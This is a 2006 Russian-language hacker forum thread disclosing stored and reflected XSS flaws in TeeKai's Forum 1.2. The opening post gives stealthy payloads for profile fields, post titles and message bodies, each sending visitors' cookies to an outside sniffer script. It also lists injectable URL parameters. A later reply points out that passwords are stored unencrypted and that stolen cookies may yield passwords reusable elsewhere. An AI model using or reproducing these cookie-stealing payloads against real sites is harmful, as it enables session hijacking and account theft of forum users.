ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS(active & passive) в TeeKai's Forum version 1.2
  #1  
Старый 26.04.2006, 22:13
Аватар для _kREveDKo_
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


Lightbulb XSS(active & passive) в TeeKai's Forum version 1.2

TeeKai's Forum version 1.2

Этот движок я нашёл у себя на халявном диске большого срока давности...Поэтому я думаю он такой и дырявый.
Поставил на локалку - и в лицо брызнуло ошибками. Странно, но на оффсайте производителя я не нашёл
ничего связанного с форумами... (http://www.teekai.info/)



1) Регестрируем пользователя. Лезем в профиль, вбиваем скрипт для вставки сниффера полях имени, возраста,
паги и урла для неё, страны.

Непалевный способ для поля url:
http://ya.ru"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><a target="_blank

Непалевный способ для поля name:
Name"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><font size="1

Непалевный способ для поля возраста, страны и названия паги:
la"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><input class="fields

Теперь наш скрипт выполняется при просмотре нашего профиля (там выводятся все юзверы сразу),a также при просмотре
созданной нами темы.



2) Создаём новый пост. Вставляем скрипт в поле для заголовка(title) и в поле для сообщения - оба они так и ждут, чтобы
через них вставили сниффер =).

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

Теперь наш скрипт выполняется при просмотре созданного топика.



3) Пассивные:


http://ya.ru/tee/index.php?action=ad...leteforums&id=[_X_S_S_] (из админки)
http://ya.ru/tee/viewtopic.php?action=viewtopic&cat=[_X_S_S_]&forumname=[_X_S_S_]&command=viewtopic&name=[_X_S_S_]&date=[_X_S_S_]&time=[_X_S_S_]



P.S. И снова я заранее извиняюсь, если эта инфа уже была где-то выложена до меня... Мне как всегда лень и жаль трафика проверять, первый ли я в нахождении багов...
 
Ответить с цитированием

  #2  
Старый 26.04.2006, 22:51
Аватар для kot777
kot777
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277

Репутация: 1635


Отправить сообщение для kot777 с помощью ICQ
По умолчанию

Форум дырка, ничего примечательного нет.
__________________
ICQ 328498627

Хочешь Элитный OpenVPN за 10 у.е ?
 
Ответить с цитированием

  #3  
Старый 26.04.2006, 23:20
Аватар для _kREveDKo_
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию

Рекламируется он как лёгкий и красивый =)
 
Ответить с цитированием

  #4  
Старый 26.04.2006, 23:56
Аватар для Desr0w
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

b00zy_c0d3r,молодец
 
Ответить с цитированием

  #5  
Старый 27.04.2006, 00:28
Аватар для ~Fenix~
~Fenix~
Banned
Регистрация: 26.07.2005
Сообщений: 240
Провел на форуме:
1266236

Репутация: 75
Отправить сообщение для ~Fenix~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от b00zy_c0d3r  
Рекламируется он как лёгкий и красивый =)
и дырявый как старая перчатка
 
Ответить с цитированием

  #6  
Старый 28.04.2006, 23:26
Аватар для _kREveDKo_
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию

Гыгы, там кстати, пасс не шифруется. Если стыбзить куки, можт пароль ещё куда подойдёт =)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ